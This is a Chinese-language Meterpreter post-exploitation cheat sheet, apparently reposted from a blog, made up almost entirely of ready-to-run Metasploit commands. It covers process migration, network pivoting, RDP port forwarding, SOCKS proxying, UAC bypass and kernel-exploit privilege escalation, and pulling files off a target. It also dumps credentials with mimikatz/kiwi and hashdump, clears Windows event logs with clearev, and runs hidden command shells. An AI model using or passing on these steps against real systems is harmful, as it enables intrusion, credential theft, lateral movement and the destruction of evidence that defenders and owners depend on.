Meterpreter后滲透
msf提供了非常強大的后滲透工具-meterpreter.獲取目標機的meterpreter后有以下優勢
- 純記憶體作業模式
- 加密通信協議,而且同時與幾個通道通信
- 攻擊行程內作業,多行程內遷移
- 平臺互通
行程遷移
通過瀏覽器的shell可能是一個脆弱的shell,將shell和一個穩定的行程系結到一起,就不需要對磁盤進行任何寫入操作.
1.meterpreter手工遷移
getpid命令查看自己的pid是多少 #遷移行程 找到一些比較經常出現在行程而且較穩定的服務進行遷移 migrate pid #原本的行程會自動關閉,為了確保不存在最好再使用kill -9 pid強制洗掉
2.msf利用模塊遷移
run post/windows/manage/migrate
系統命令
1.收集系統資訊
sysinfo
2.查看網路設定
route
3.查看當前權限
getuid
4.查看網路結構
先進行跳轉,輸入background將meterpreter中斷隱藏在后臺
route add命令添加路由,
meterpreter > background
backgrounding session 1 . . .
msf > route add 192.168.1.0 255.255.255.0 1(session 1的意思)
msf > route print
active routing table
subnet netmask gateway
192.168.1.0 255.255.255.0 session 1
網路類命令
ipconfig/ifconfig arp -a netstat -ano getproxy #查看代理資訊 route #路由
埠轉發
portfwd add -l 6666 -p 3389 - r 127.0.0.1 #將目標機的3389埠轉發到本地6666埠
autoroute添加路由
run get_local_subnets run autoroute -s 192.168.1.0/24 #添加到目標環境網路 run autoroute -p #查看添加的路由
socks4a代理
autoroute添加完路由后,利用msf自帶的socks4a代理
msf > use auxiliary/server/socks4a msf > set srvhost 127.0.0.1 msf > set srvport 1080 msf > run vi /etc/proxychains.conf socks4 127.0.0.1 1080
利用proxichains 訪問
提權
getsystem提權
bypassuac提權
search bypassuac
有以下幾個
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
例如:
msf > use exploit/windows/local/bypassuac
msf > set SESSION 2
msf > run
再次執行getsystem獲取系統權限
內核漏洞提權
先用enum_patches收集補丁資訊,查找可用的exploit進行提權
search enum_patches
meterpreter > run post/windows/gather/enum_patches #查看補丁資訊 msf > use exploit/windows/localms13_053_schlamperei msf > set session 2 msf > exploit
檔案系統命令
1.查看當前處于目標機的哪個目錄
pwd / getwd
getlwd:查看當前處于本地的某個目錄
ls:列出當前目錄所有檔案
2.搜索指定型別的檔案
search -f *.txt -d c:\
-f 用于指定搜索檔案 -d 指定哪個目錄下進行搜索
3.下載檔案
download 目標機檔案 攻擊機目錄
download c:\test.txt /root
4.上傳檔案
upload 攻擊機檔案 目標機路徑
5在目標機切換目錄
lcd /tmp #操作攻擊者主機 切換目錄
抓密碼
mimikatz抓
load kiwi
creds_all
1.hashdump 2.run windows/gather/smart_hashdump 3.run windows/gather/credentials/windows_autologin
清除日志
clearev #清除windows中的應用程式日志、系統日志、安全日志
執行檔案
execute #在目標機中執行檔案
execute -H -i -f cmd.exe # 創建新行程cmd.exe,-H不可見,-i互動
獲得shell以后的獲取敏感檔案操作
判斷是否為多網卡機器掃描其他網段
盡量收集機器上的敏感資訊,敏感內部檔案,賬號密碼本等
1.抓取自動登錄的密碼
run windows/gather/credentials/windows_autologin #抓取用戶存盤的自動登錄賬戶密碼
2匯出密碼hash
hashdump
3.查看權限后,抓取密碼
getuid
#load mimikatz開啟功能 / load kiwi
creds_all #抓取密碼 retrieving all credentials

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/550209.html
標籤:其他
